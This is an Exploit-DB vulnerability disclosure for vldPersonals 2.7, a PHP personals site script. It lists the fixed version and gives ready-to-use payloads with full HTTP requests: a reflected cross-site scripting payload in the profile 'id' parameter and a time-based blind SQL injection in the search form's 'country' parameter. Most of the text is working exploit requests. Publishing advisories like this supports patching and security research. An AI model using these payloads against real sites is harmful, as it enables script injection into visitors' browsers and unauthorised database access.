vldPersonals 2.7 - Multiple Vulnerabilities

EDB-ID:

35193

Author:

Mr T

Type:

webapps

Platform:

PHP

Published:

2014-11-10

# Exploit Title: VLD Personal – Multiple Vulnerabilities
# Date: 09/11/2014
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7
# Fixed Version 2.7.1
# Tested on: Windows / Linux

XSS Attack

Issue detail:
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9811c”><script>alert(1)</script>b7ec317c816 was submitted in the id parameter.

Response :
GET /index.php?m=member_profile&p=profile&id=9811c”><script>alert(1)<%2fscript>b7ec317c816 HTTP/1.1



SQL Injection:
Issue detail:
The country/gender1/gender2 parameter appears to be vulnerable to SQL injection attacks. The payload and benchmark(20000000,sha1(1))– was submitted in the country parameter. 

Response:
POST /index.php?m=search HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Cookie: visitors=x466x3878x3725x3797; PHPSESSID=nu75qtji88q4bilghhtg2s2; sessdata=0
>age_from=19&age_to=19&issearch=1&submit=Search&gender1=2
>&gender2=2&type_id=members
>&country=
>1%20and%20benchmark(20000000%2csha1(1))–%20


-- 
Talib Osmani